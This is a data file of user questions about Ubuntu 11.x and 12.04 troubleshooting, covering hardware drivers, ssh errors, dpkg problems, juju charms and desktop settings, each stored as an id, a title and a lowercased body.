134223	installing ubuntu on an eee pc 1011px	i have recently bought myself an eee pc 1011px that came with windows 7 starter . i have since upgraded to windows 7 ultimate , however , i also wish to install ubuntu on a separate partition . my question is whether or not this is possible , and whether or not the boot loader that comes with ubuntu will interfere with the os switch that currently allows switching between windows 7 and express gate cloud ? a quick google search has revealed that i can install eeexubuntu on an sdhc , and therefore avoid installing a boot loader altogether . however , it 's release date leaves a lot to be desired ... . i could always install xandros that is more eee pc friendly , however , i 'd be asking the same questions as above . what 's more , i do n't think that xandros is free . my second question is whether or not ubuntu can be installed on a sdhc , and executed in a similar fashion to eeexubuntu ? any advice/help would be appreciated .
134227	how to extract files from a split 7zip archive ?	i downloaded a series of packages that all compress one thing . the files end in .0 , .1 , .2 , etc . the user lists of these packages i downloaded say to use the file.bat to successfully extract , or to use 7zip . i do not understand how to do that with 7zip .
134229	how can i use multitouch apps in ubuntu 12.04 ?	i am running ubuntu 12.04 on a lenovo x220 tablet and i want to get a feel of what multitouch applications/games are available . i installed anything mentioning multitouch from the repository , for example here are some of the game i installed : planarity multitet sponc empcommand however , my multitouch input is not correctly being registered by these application . in some cases touch inputs show at the very edges of the screen regardless of where i touch and in some other cases no input seem to be registered or at least visible in the game . i dont know yet if this is a bug or if i am missing an application or setting . i tried calibrating the multitouch device using calibrate touchscreen tool , but that did not resolve this issue . here is some more information about my multitouch device . first let look at the output of xinput list : : ~ $ xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ wacom isdv4 e6 pen stylus id=10 [ slave pointer ( 2 ) ] ⎜ ↳ wacom isdv4 e6 finger touch id=11 [ slave pointer ( 2 ) ] ⎜ ↳ tpps/2 ibm trackpoint id=14 [ slave pointer ( 2 ) ] ⎜ ↳ wacom isdv4 e6 pen eraser id=16 [ slave pointer ( 2 ) ] ⎜ ↳ synps/2 synaptics touchpad id=13 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ sleep button id=8 [ slave keyboard ( 3 ) ] ↳ integrated camera id=9 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=12 [ slave keyboard ( 3 ) ] ↳ thinkpad extra buttons id=15 [ slave keyboard ( 3 ) ] the multitouch screen is being registered as a pointer device . right now evtest or ntview can not access the device yet . next , i disabled the xinput device : ~ $ xinput set-prop 11 'device enabled ' 0 now evtest is able to access the touch events . here is a example snippet of the output , i was touching the top left corner area : event : time 1336532858.731191 , type 3 ( ev_abs ) , code 54 ( abs_mt_position_y ) , value 62 event : time 1336532858.731201 , -- -- -- -- -- -- -- syn_report -- -- -- -- -- -- event : time 1336532859.983263 , type 3 ( ev_abs ) , code 53 ( abs_mt_position_x ) , value 35 event : time 1336532859.983265 , type 3 ( ev_abs ) , code 54 ( abs_mt_position_y ) , value 61 event : time 1336532859.983272 , type 3 ( ev_abs ) , code 0 ( abs_x ) , value 33 event : time 1336532859.983274 , -- -- -- -- -- -- -- syn_report -- -- -- -- -- -- event : time 1336532860.663216 , type 3 ( ev_abs ) , code 53 ( abs_mt_position_x ) , value 36 event : time 1336532860.663218 , type 3 ( ev_abs ) , code 54 ( abs_mt_position_y ) , value 58 also mtview works now , here is a snippet from its output : : ~ $ sudo mtview /dev/input/event13 map : 0.000000 0.000000 0.000000 0.000000 1366.000000 768.000000 map : 50.000000 52.000000 0.000000 0.000000 1366.000000 768.000000 map : 634.000000 52.000000 0.000000 0.000000 1366.000000 768.000000 map : 99.000000 74.000000 0.000000 0.000000 1366.000000 768.000000 map : 49.000000 52.000000 0.000000 0.000000 1366.000000 768.000000 map : 0.000000 0.000000 0.000000 0.000000 1366.000000 768.000000 map : 49.000000 52.000000 0.000000 0.000000 1366.000000 768.000000 map : 49.000000 24.000000 0.000000 0.000000 1366.000000 768.000000 in the mtview painting based interface , i can brush with a maximum of two fingers , so my guess is that this multitouch device doesnt really support more that two simultaneous touch events , but i am not 100 % sure about that yet . the pointer decive based on multitouch input seems to work perfectly fine and i can interact with non-multitouch applications . however none of the applications that are built to use multitouch input seem to work yet . disclaimer : i had mentioned this issue in another question previously , but then i realized it was probably worthy of its own question .
134231	how to change permission in 11.04 version of ubuntu for root in the file system	recently installed 11.04 version of ubuntu . wanted to create a folder in the root of the filesystem , but the persmission was denied . tried with chown and chmod but no result . kindly assist me
134232	stuck while upgrading from ubuntu 11.10 to 12.04	i have ubuntu 11.10 installed within windows vista . i am trying to upgrade it to 12.04. but the update manager seems to be stuck at `` installing the upgrades '' while configuring manpages . i did a restart but after which my wi-fi driver was lost . after the restart , it started witing 12.04 but my wi-fi driver which i had installed was not to be found . now what to do.it did'nt upgrade fully .
134236	ssh problems ( ssh_exchange_identification : read : connection reset by peer )	i was running 11.10 and decided to do the full upgrade and come up to 12.04 after the update ssh ( not sshd ) is now misbehaving when attempting to connect to other openssh instances . i say openssh as i am running a dropbear sshd on my router and i am able to connect to it . when attempting to connect to an openssh server risk @ skynet : ~/.ssh $ ssh -vvv risk @ someserver openssh_5.9p1 debian-5ubuntu1 , openssl 1.0.1 14 mar 2012 debug1 : reading configuration data /home/risk/.ssh/config debug3 : key names ok : [ ssh-rsa-cert-v01 @ openssh.com , ssh-dss-cert-v01 @ openssh.com , ssh-rsa-cert-v00 @ openssh.com , ssh-dss-cert-v00 @ openssh.com , ecdsa-sha2-nistp256 , ecdsa-sha2-nistp384 , ecdsa-sha2-nistp521 , ssh-rsa , ssh-dss ] debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug2 : ssh_connect : needpriv 0 debug1 : connecting to someserver [ someserver ] port 22. debug1 : connection established . debug1 : identity file /home/risk/.ssh/id_rsa type -1 debug1 : identity file /home/risk/.ssh/id_rsa-cert type -1 debug1 : identity file /home/risk/.ssh/id_dsa type -1 debug1 : identity file /home/risk/.ssh/id_dsa-cert type -1 debug3 : incorrect rsa1 identifier debug3 : could not load `` /home/risk/.ssh/id_ecdsa '' as a rsa1 public key debug1 : identity file /home/risk/.ssh/id_ecdsa type 3 debug1 : checking blacklist file /usr/share/ssh/blacklist.ecdsa-521 debug1 : checking blacklist file /etc/ssh/blacklist.ecdsa-521 debug1 : identity file /home/risk/.ssh/id_ecdsa-cert type -1 ssh_exchange_identification : read : connection reset by peer risk @ skynet : ~/.ssh $ dropbear instance risk @ skynet : ~/.ssh $ ssh -vvv root @ darkness openssh_5.9p1 debian-5ubuntu1 , openssl 1.0.1 14 mar 2012 debug1 : reading configuration data /home/risk/.ssh/config debug3 : key names ok : [ ssh-rsa-cert-v01 @ openssh.com , ssh-dss-cert-v01 @ openssh.com , ssh-rsa-cert-v00 @ openssh.com , ssh-dss-cert-v00 @ openssh.com , ecdsa-sha2-nistp256 , ecdsa-sha2-nistp384 , ecdsa-sha2-nistp521 , ssh-rsa , ssh-dss ] debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug2 : ssh_connect : needpriv 0 debug1 : connecting to darkness [ 192.168.1.1 ] port 22. debug1 : connection established . debug1 : identity file /home/risk/.ssh/id_rsa type -1 debug1 : identity file /home/risk/.ssh/id_rsa-cert type -1 debug1 : identity file /home/risk/.ssh/id_dsa type -1 debug1 : identity file /home/risk/.ssh/id_dsa-cert type -1 debug3 : incorrect rsa1 identifier debug3 : could not load `` /home/risk/.ssh/id_ecdsa '' as a rsa1 public key debug1 : identity file /home/risk/.ssh/id_ecdsa type 3 debug1 : checking blacklist file /usr/share/ssh/blacklist.ecdsa-521 debug1 : checking blacklist file /etc/ssh/blacklist.ecdsa-521 debug1 : identity file /home/risk/.ssh/id_ecdsa-cert type -1 debug1 : remote protocol version 2.0 , remote software version dropbear_0.52 debug1 : no match : dropbear_0.52 ... i have googled and ran most all fixes recommend both from the debian and arch sides and none of them seem to resolve my issue . any ideas ?
134237	how do i deploy a charm from a local repository ?	i am trying to run the charm tutorial from the juju documentation by creating a new charm from a local repository . i started by installing the charms from bzr to my local ubuntu 12.04 desktop running in a virtual machine . the new file structure is the following : ubuntu @ ubuntu-virtualbox : ~ $ find charms/precise/drupal/ charms/precise/drupal/ charms/precise/drupal/hooks charms/precise/drupal/hooks/db-relation-changed charms/precise/drupal/hooks/install charms/precise/drupal/hooks/start charms/precise/drupal/hooks/stop charms/precise/drupal/metadata.yml charms/precise/drupal/readme when i install the mysql charm , which was downloaded from the remote charm repository , it works fine . however when i run the following command to deploy the new charm it fails with the following error message : ubuntu @ ubuntu-virtualbox : ~ $ juju deploy -- repository=charms local : precise/drupal 2012-05-09 10:01:05,671 info searching for charm local : precise/drupal in local charm repository : /home/ubuntu/charms 2012-05-09 10:01:05,845 warning charm '.mrconfig ' has an error : charmerror ( ) error processing '/home/ubuntu/charms/precise/.mrconfig ' : unable to process /home/ubuntu/charms/precise/.mrconfig into a charm charm 'local : precise/drupal ' not found in repository /home/ubuntu/charms 2012-05-09 10:01:06,217 error charm 'local : precise/drupal ' not found in repository /home/ubuntu/charms is there some file missing in the drupal charm directory that juju needs to make the charm valid ? also , i get the file processing error for the .mrconfig file also when deploying the mysql charm so is there something i need to change there perhaps ?
134238	the new ea games can not be found in the software center	well , i want to install the two ea games that arrived in the software center recently . but these packages seem to be missing as in the following picture : i 've tried to update the sources , and tried to search manually but no luck . and i 've tried installing them using the terminal also . despite the fact that they are online games , how can i fix this ? i am on ubuntu 12.04 .
134239	how to register a shell script as the main application for a given file extension	i have a shell script `` the_script '' that i would like to register as the default application for the files with the extension `` .ext '' . for this purpose , i have written an xml file to register the mime type , and a .desktop file to associate the application with the mime type . the script has the executable bit for the user and is available in the user 's path . the xml file , named `` the_script.xml '' is as follows : < ? xml version= '' 1.0 '' encoding= '' utf-8 '' ? > < mime-info xmlns= '' http : //www.freedesktop.org/standards/shared-mime-info '' > < mime-type type= '' application/x-the-script '' > < comment > a file for the script < /comment > < glob pattern= '' *.ext '' / > < /mime-type > < /mime-info > then i ran xdg-mime install -- novendor the_script.xml . the .desktop file , named `` the_script.desktop '' is as follows : [ desktop entry ] version=1.0 type=application mimetype=application/x-the-script name=the script that manages .ext files comment=interpreter for .ext files tryexec=the_script exec=the_script % f terminal=false and i ran xdg-desktop-menu install -- novendor the_script.desktop to register the file . once that both files are registered , the .ext files do not open with the text editor any more but gnome tells me that there is no installed application for the files `` a file for the script '' . i have successfully registered other file formats with other applications . the other applications were compiled programs while the_script is a shell script . that is the only difference i can see . how can i register my script with the .ext files ?
134242	install unity-2d in ubuntu 10.04	recently i installed ubuntu 12.04 and i really liked the unity interface . however my computer is not fast enough to deal completely with it . so i went back to the good old 10.04 , because it goes like a lightning on my computer . anyway , i was wondering if i could install unity 2d inteface ( because it works faster i think ) in my lucid lynx , besides the default gnome . thanks in advance , and have a good day .
134244	black screen on fresh install of 12.04	when i try to install 12.04 , i get a black screen . i also get the black screen when i try the livecd . i did get it to work by using the `` nomodeset '' setting in grub , but know the resolution on my lcd is wrong .
134249	connecting to windows shares using active directory ?	after upgrading my host to 12.04 i can no longer connect to windows shares in my ad ( active directory ) based network . i was able to do it previously using 11.10 . i thought it might be an issue with the upgrade so i flattened my box and re-installed from scratch and i still ca n't connect . when i use the files > connect to server command , i am met with a constant password challenge when accessing any windows server using any known working network account . i checked the logs on the windows machine to see if there are failed connections but there are none , yet 12.04 asks me for my password over and over as if my credentials were wrong . any suggestions ?
134252	is there any alternative for windows gadgets in ubuntu ?	i am new to ubuntu and would very much like to see a weather gadget ( aka widgets ) . can anyone recommed a simple add-that could give me a little weather , clock , twitter crawl , etc ? thanks
134254	how much disk space should i reserve for installing wubi on laptop running window 7 ?	i am pretty new to ubuntu and want to install it on my laptop to have a try . but i do n't know how much disk space should i reserve for wubi [ i mean when i install it via window installer , what setting should i use ] . i have one hard disk divided into two drives . window 7 is installed on c : / , so should i install wubi on d : / ? and what would ubuntu 's version be on wubi ? thank you . my hd has 640gb , they are divided equally , with 201gb free space on c and 85gb on d ( i could certainly free much more space here ; ) ) . 15 gb , then i would run wubi smoothly , right ? btw , would installing wubi slow my window 7 down ? and how about the time used to start my laptop ? thank you . and , i use d for media storge . but would wubi-ubuntu be able to access any folder and file on my drive , even if i install on d ? â andrew 1 min ago edit one more question , would i be able to change the language setting like english ( uk ) to english ( us ) , english to chinese , or etc ? sth just pop up , my window 7 is 64-bit , would there be any problem installing wubi ?
134258	overheating using a i7 intel processor while using ubuntu	i use a intel i7 dell-laptop . i installed ubuntu 12.04 ( 64bit ) from scratch . i realized the cpu temperature increased immediately ( it 's not difficult to detect temperature with this computer only by hand ) . when i played flash players in youtube or elsewhere i saw in the system manager that only one core increased working frequency despite all other . and that core was like 80-90 % while the others stayed at 5 % . any suggestions ? should i install 32bit version of ubuntu ?
134262	how can i enable two-finger scrolling in ubuntu 12.04 ?	i need help with getting two-finger scrolling to work in ubuntu 12.04 32-bit . it used to work in previous ubuntu versions , so i know it can be done . however the option to enable two-finger scrolling is grayed out in the `` mouse and touchpad '' settings panel : i 'm using a synaptics touchpad . i 'm still a bit of a noob when it comes to ubuntu , so if you enlighten me , i would be very happy . it 's really annoying , because i came to love it in windows .
134266	how do i prevent the lp module from loading on boot ?	i use some software under a vmware vm that needs to access the parallel port . if the lp kernel module is loaded , vmware 's player ca n't access the port . i need to unload the module every time i want to use it under my virtual machine , and since i never use it under ubuntu itself , it 'd be nice if it was just not loaded by default . i 've tried adding blacklist lp to /etc/modprobe.d/blacklist.conf and running sudo update-initramfs -k all -u , but lsmod shows that it 's still loaded after i boot . how can i keep the module from being loaded ? i 'm using ubuntu 11.10 with the 3.0.0-x kernels from the kernel team ppa .
134268	super key combinations for media keys do n't work	my keyboard does n't have media keys and i 've always used super shortcuts for media keys . however in ubuntu 12.04 they no longer work . i want : super+c - play/pause super+x - stop super+z - previous super+v - next i 've tried replacing `` super '' with `` mod4 '' in gconf-editor in /apps/gnome_settings_daemon/keybindings after setting them in settings â keyboard â shortcuts . i 've checked other keybinding locations but have found no other media keybinding settings in gconf-editor . my muscle memory thanks you in advance ; )
134270	setting up a remote mail server	i have an ubuntu server running at a remote location which i log into with putty my dynamic ip is maintained using a noip account . i am trying to learn about php dynamic websites and as a result i also connect to this remote server using core ftp and an ftp connection from a copy of dreamweaver studio8 . it 's taken a while but i appear to have e-mail working from a `` telnet local host 25 '' and now my web page contact appears to be working . however when i looked at my mail queue using mailq i have four refused e-mails from the dynamic assigned ip . when i followed this up i found the ip was sometimes blocked by spamhaus pbl and investigation suggested i set up a smarthost through my isp but the server is on one isp and my home account and target for my mail is another so which isp do i use ? the infuriating thing is at most the out going e-mail will go to one of three addresses and even then only one at any one time i would realy like to be able to say this domain name with associated ip address can mail to this e-mail adddress so that this can not be hijacked by spammers . so a second question is if this is possible how do i do this ?
134275	installed trac and svn on ubuntu server 12.04lts - login not working , and no svn connection	i am new to svn and trac . i successfully managed to set-up svn repo and even do my first commit : = ) for project management i was advised to also install trac . i followed these instructions : http : //www.subversionary.org/howto/setting-up-a-subversion-server-on-ubuntu-gutsy-gibbon-server i had to chown svn repo folder to www-data otherwise i could not commit through http . i did chown on trac folder too www-data.svn so what is the problem ? why login does not work ? i have this : < location /trac/ [ [ : alnum ] ] +/login '' > authtype basic authname `` subversion repository '' authuserfile /etc/apache2/passwords require valid-user < /location > < location /trac > sethandler mod_python pythoninterpreter main_interpreter pythonhandler trac.web.modpython_frontend pythonoption tracenvparentdir /var/www/trac pythonoption tracuriroot /trac < /location > there is something i am missing , or not understanding on how trac should work .
134279	how can i turn off hard disk power management in 12.04 ?	in ubuntu 12.04 the power management does not allow control of hard disk spinning preferences . as a result , when the laptop is on battery the hard disk continues to stop spinning to save power . i could change manually the settings via the command sudo hdparm -b 255 /dev/sda that disables the hard disk power management and lets it spin continuously also on battery . but when i plug the laptop to power and then return to battery the manual setting is lost . is there a way to configure this permanently ? i really do n't care if the laptop consumes more power , but i do n't like the disk stopping and starting when i am on battery .
134280	what are the nvidia video card compatible with ubuntu 12.04 64bit	what are the nvidia video card compatible with ubuntu 12.04 64bit ? could you provide the list of compatible nvidia video cards with ubuntu 12.04 64bit
134283	why this dpkg error : ambiguous package name 'libglib2.0-0 ' ... ?	i have some weird errors while trying to install packages with software center or even when i try to upgrade packages with sudo apt-get install upgrade : dpkg : error : file triggers record mentions illegal package name `libglib2.0-0 ' ( for interest in file `/usr/lib/x86_64-linux-gnu/gio/modules ' ) : ambiguous package name 'libglib2.0-0 ' with more than one installed instance previously i had error : dpkg : error : configuration error : /etc/dpkg/dpkg.cfg.d/multiarch:1 : unknown option 'foreign-architecture' but i have just removed it with : sudo rm /etc/dpkg/dpkg.cfg.d/multiarch , i guess this post describes this issue - i have followed it , but the last part sudo apt-get install dpkg=1.16.0.3ubuntu5 did not work for me - no such package could be found . probably it is because i am using ubuntu 12.04 . update : adter trying to installcorrect version of dpkg 1.16.1.2ubuntu7 as suggested in the answer , i now get following errors : $ sudo apt-get install dpkg=1.16.1.2ubuntu7 reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : ia32-libs : depends : ia32-libs-multiarch but it is not installable e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . by the way , this might be also helpful : $ sudo dpkg -- configure -a dpkg : error : file triggers record mentions illegal package name `libglib2.0-0 ' ( for interest in file `/usr/lib/x86_64-linux-gnu/gio/modules ' ) : ambiguous package name 'libglib2.0-0 ' with more than one installed instance which is actually telling the same thing . update : content of ( ... ) modules : /usr/lib/x86_64-linux-gnu/gio/modules $ ls giomodule.cache libgiognutls.so libgvfsdbus.so libdconfsettings.so libgiolibproxy.so libgiognomeproxy.so libgioremote-volume-monitor.so update : /var/lib/dpkg/triggers/file $ sudo grep libglib /var/lib/dpkg/triggers/file /usr/lib/x86_64-linux-gnu/gio/modules libglib2.0-0 /usr/lib/gio/modules libglib2.0-0 /usr/share/glib-2.0/schemas libglib2.0-0 /usr/lib/i386-linux-gnu/gio/modules libglib2.0-0 : i386 /usr/lib/gio/modules libglib2.0-0 : i386 /usr/share/glib-2.0/schemas libglib2.0-0 : i386
134288	how do i connect to the internet ?	i just installed ubuntu . how can i make an internet connection ? when i start firefox , the response is server not found . i have a bsnl broadband connection in india via my telephone line and a adsl modem .
134290	finer control over units in nautilus size column	is there a way to configure nautilus so that the size all used the same unit , say kb or mb , rather than varying units ? i find it hard to see , at a glance , the relative sizes of things when the units are changing all the time - especially when i have the view sorting on some other column . also , is it possible to have folders to list the recursive size contained inside , rather than just saying `` 5 items '' or similar ?
134292	unlock login keyring problem - ubuntu 12.04 lts	i was using my ubuntu 12.04 without any problem . suddenly when i tried to connect to a vpn , the unlock login keyring window appeared . i tried my user password , also my vpn password and none of them were accepted . every time i try to change any of my vpn settings the window will appear again . it will be gone after many times of cancellation . how can i get rid of this window forever ? !
134296	external speakers seem to sleep sony active speaker system srs-d4	i have these external speakers : sony active speaker system srs-d4 plugged into a ubuntu 11.10 laptop ( same issue with a previous ubuntu desktop system . ) it 's almost as if the speakers sleep after some amount of inactivity . youtube videos play fine with audio , but system alerts , such as when a torrent download completes , or email notifications , are not audible . presumably since the system is sitting there not playing sound . does anyone know how to fix this ? edit : if i am playing audio such as an mp3 through rhythmbox or youtube video , i do hear system sounds . sorry fi that was n't clear . i.e . if audio is already playing i hear everything . it 's as if the speakers take a small amount of time to `` wake up '' and play something . for short system sounds this seems to be too short of a time so i hear nothing .
134298	how do i set up gitorious server on ubuntu ?	i wanted to know how i can set up gitorious server on ubuntu and have it work locally . i 'm running 12.04 and would like to get the latest version
134305	ubuntu one - purchase storage	2 years ago ubuntu said we will be able to purchase ubuntu one storage via paypal sometime . does anyone know what 's the progress ? yesterday i tried to buy some gigabytes but there is always a payment failure . am i the only one who 's affected or is this a general known problem ?
134307	what has changed in unicode font rendering since 11.04 ?	this is how a web page fragment shows on my old 11.04 system : and this is how the same fragment showed on 11.10 and shows on my current 12.04 system : any idea what 's wrong ? of course i have all the same fonts installed ( i believe the page uses some kind of arial , which i installed from the mscorefontstt package iirc ) and i 'm running the same version of firefox . how can i fix things ?
134308	how can i upgrade the video driver for ubuntu 12	when i play videos , whether they 're avi , wmv , or mkv , the colors are not correct ( all deep blues and browns ) . i have a feeling a need a specific driver for my built in video circuit ( it 's a compaq cq61 ) instead of the default basic driver that seems to be loaded . where do i find such a driver and how do i install it . thanks in advance . mike
134311	problem playing minecraft - turns out to be graphics card problem ati radeon 6800m	i posted on the [ ubuntu forums ] ( http : //ubuntuforums.org/showthread.php ? t=1976246 ) but have had no luck so i thought i 'd post on here . after fiddling with java and my graphics card drivers i eventually got minecraft to work . however i noticed that i was getting fps lag in minecraft so i thought there was a problem with my graphics card drivers , i looked around and was told to install the proprietary drivers , so i did that initially from the `` additional drivers '' manager , after this , minecraft broke and would n't let me get passed the login screen , it would hit a black screen and then crash . i then downloaded the ( i think ) binary drivers of off amd.com and followed instructions on how to install it from their `` unofficial '' wiki . after doing that i managed to get passed the black screen that minecraft produced but i was met with a minecraft crash error , the error i got was as follows : minecraft has crashed ! -- -- -- -- -- -- -- -- -- -- -- minecraft has stopped running because it encountered a problem . -- - begin error report 7cf3a456 -- -- -- -- generated 5/9/12 8:47 am minecraft : minecraft 1.2.5 os : linux ( amd64 ) version 3.2.0-24-generic java : 1.6.0_32 , sun microsystems inc. vm : java hotspot ( tm ) 64-bit server vm ( mixed mode ) , sun microsystems inc. lwjgl : 2.4.2 [ failed to get system properties ( java.lang.nullpointerexception ) ] org.lwjgl.lwjglexception : x error - disp : 0x7f4ec402b580 serial : 31 error : badrequest ( invalid request code or no such operation ) request_code : 154 minor_code : 14 at org.lwjgl.opengl.linuxdisplay.globalerrorhandler ( linuxdisplay.java:268 ) at org.lwjgl.opengl.linuxdisplaypeerinfo.initdefaultpeerinfo ( native method ) at org.lwjgl.opengl.linuxdisplaypeerinfo. < init > ( linuxdisplaypeerinfo.java:52 ) at org.lwjgl.opengl.linuxdisplay.createpeerinfo ( linuxdisplay.java:684 ) at org.lwjgl.opengl.display.create ( display.java:854 ) at org.lwjgl.opengl.display.create ( display.java:784 ) at org.lwjgl.opengl.display.create ( display.java:765 ) at net.minecraft.client.minecraft.a ( sourcefile:236 ) at net.minecraft.client.minecraft.run ( sourcefile:657 ) at java.lang.thread.run ( thread.java:662 ) -- - end error report bb10d65a -- -- -- -- -- when i try to execute a driver related command such as glxinfo , it returns this : name of display : :0 x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 154 ( glx ) minor opcode of failed request : 19 ( x_glxqueryserverstring ) serial number of failed request : 12 current serial number in output stream : 12 lspci | grep vga returns this : 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati broadway [ ati mobility radeon hd 6800 series ] dmesg | grep ati returns this : [ 3.721176 ] fglrx : module license 'proprietary . ( c ) 2002 - ati technologies , starnberg , germany ' taints kernel . i have no idea how to solve my graphics card issue and would be much appreciated if someone could help me .
134315	how to make embedded videos work in pdfs created by latex ?	i am on ubuntu 10.04 32-bit and using adobe reader 9 . i am using latex beamer to create my slideshow . in windows and macos i can open and play the embedded video in adobe reader . but i simply ca n't get it to work in ubuntu . so right now i do all my stuff including make the presentations in ubuntu , but then i have to boot to windows to show it . here is a sample presentation . and a sample .mov movie try installing ubuntu-restricted-extras ?
134317	how do i get the same dual-screen experience on my install as i had on the 12.04 live cd ?	i downloaded , burned to disc , and booted ubuntu 12.04 precise ( i defected to arch for a year when i got fed up of natty ) . i was pleasantly surprised by both of my monitors working perfectly on there ( needed to rearrange as my secondary monitor is to the left , however ) . so i installed . there 's no recognition of the second monitor now , and it does n't appear in the settings . i 've also enabled the nvidia driver . what do i do ?
134323	ca n't slow down the pointer speed enough	i have changed my mouse , bought a new set but still no use - it 's too fast for a designer . and in the new version ( 12.04 ) i do n't even know how to find the xorg.conf , or anything would help is not there any application for this to adjust mouse sensivity more than the default options like logitech applications for windows ? keyboard and mouse model : logitech mk520 wireless laser mouse & keyboard set . mouse model : m310 ( laser , wireless )
134327	there is no sound in fluxbox	in both gnome and unity sound works pretty great . but , when i switch to fluxbox , voila , no sound ! how do i fix this ? also , i saw the keyboard shortcuts in the ./fluxbox/keys folder , and they simply seem to do nothing . they are configured like this : control 1 : exec amixer sset master,0 1+ control 2 : exec amixer sset master,0 1- control 0 : exec amixer sset master,0 toggle what do i do ?
134333	where do i modify the cups printer configuration ?	our systems people want us to configure the network printers via cups . i am using ubuntu 12.04 and i can not see how to set up the printers in the graphical menu . the instructions i got are the following : edit cupsd.conf ( probably in /etc/cups but varies by distribution ) to contain the lines : browsepoll printhost01.myorg.ac.uk browsepoll printhost02.myorg.ac.uk where should i do this in my ubuntu 12.04 ?
134335	double screen does n't work	i ca n't solve a problem with my screen configuration . i tryed in anher italian forum , but i have n't find a solution . in my configuration i have an nvidia geforce 480x . i 'm trying to use 2 screen , for work , and with ubuntu 11.10 i was using already this configuration , and the only problme was ane error message at the start up , but nothing else . now i ca n't use 2 screen without error . first of all i want eliminate the upper bar from the second screen , but when i try to open the monitor configuration an error appears and sad that the randr extension is not present ... and when i boot the system ubuntu notify me that he encountered a system error ! ! ! i 've tryed both twinview and separeted screen , but none of them work at well ... i ca n't believe that a thing that work so easy in windows ca n't work at well also in ubuntu , so please help me ! ! thanks . ps : this is a link with an image of my 2 screens http : //www.obit8.com/errore.png consider that for now i do n't have anymore the error about the configuration .
134342	which iso image do i need to install ubuntu 12.04 on a macbook pro so that it boots using ( u ) efi ?	unlike with earlier releases , the website is unclear on giving a straight recommendation for installing ubuntu on a mac : http : //cdimage.ubuntu.com/releases/12.04/release/ i 've read several times , that i should use an alternative image . but this is only offered as 64-bit . however , i 'm also told to rather use 32-bit images for better software compability . http : //cdimage.ubuntu.com/releases/12.04/release/ubuntu-12.04-alternate-amd64+mac.iso even though i should only use alternative images , there is offered a standard desktop image which is `` adjusted to work properly on mac systems '' . http : //cdimage.ubuntu.com/releases/12.04/release/ubuntu-12.04-desktop-amd64+mac.iso question which image should i take ? do both of these images offer ( u ) efi boot ? i 've tried both of them already , but both have setup an install with bios emulation . this is quite annoying because of the short battery life and high temperatures which are harmful to battery longevity .
134344	mp4 video playback is horrible	how can i get mp4 video to playback normal . they skip and look horrible . i was able to get them to playback on fedora using a different setting with smplayer but nothing seems to work with ubuntu .
134346	why is unity 2d being discontinued ?	as reported by phoronix , the news from uds appears to be that development on unity 2d will stop , with the focus being on a single , unified implementation . obviously maintaining two codebases to do the same thing is not ideal . however , unity 2d was created for a reason ( `` unity 2d 's goal is to provide the unity desktop shell on hardware platforms that can not currently support unity 's opengl requirements '' ) . why is it no longer felt unity 2d is needed ?
134349	how do i fix hybrid graphics on a dell xps l502 ?	i 'm using a dell xpsl502 15 ' and it 's facing hybrid graphics problem . i 'm really desperate , i do n't know what to do - how should i fix this ? this problem has occurred before on other linux variatns for me too , e.g . blackbuntu , bachtrack , debian 6.0.4 squeeze , chackra , ... please help me if you solved this problem .
134350	i dropped my laptop . smart says there are bad sectors . can i fix this ?	i have ubuntu and win7 both installed on my laptop . i was working on windows when i dropped the laptop from about 3.5feet in air . ever since , windows is unable to boot . but ubuntu works just fine . when i ran smart , it shows me there are a few bad sectors . i 'm attaching a screen shot of the report . can anyone suggest what must be done ? here 's the image :
134356	partitions not showing up in ubuntu after wubi installation	so i installed ubuntu 12.04 with wubi on my windows 7 system . everything worked just fine after some tries , the first tries at installing failed because i had a ubuntu iso file in my download folder which is where wubi was . when i now boot into ubuntu , i can see 2 of my 4 partitions . the first is my c : drive , that is where i installed wubi so i did n't really got surprised because that one was n't there . but the other partition that did n't show up was my documents partition . i did n't do anything special with it , but it does n't show up in ubuntu . the wubidir file is in the documents partition as well as in all the other partitions . how can i get the partitions to show up ? update : the partition is not showing up in gparted ( at least not with name ) . there is one partition without name that has an warning sign on , but it is way too small for being the missing partition . here is a screen-shot : and here is how it looks in windows ( easeus partition master ) :
134364	kubuntu for usb , where to find this iso-file ?	i downloaded universal-usb-installer-1.8.9.6 to install kubuntu at an usb-drive . now the installer is asking for an iso-file . where can i find it ?
134366	why ekiga does not connect on 12.04	i was using ekiga voip application very well with 11.04 , but it never works on 11.10 and 12.04.it does not connect but always prompts this dialog : '' could not register.remote party host is offline '' .here is the debug output of this application.i contacted the developer mr.eugen for several times but he said this bug is already fixed.i searched for the ppa for this application but could not find any so far.if anybody here knows about this issue , please help me .
134371	how do i set default view to 'list ' in nautilus file manager ?	i would like to set my nautilus `` default view '' to list globally on my pc . is this possible , if so , how do i achieve this ? linked question ( old )
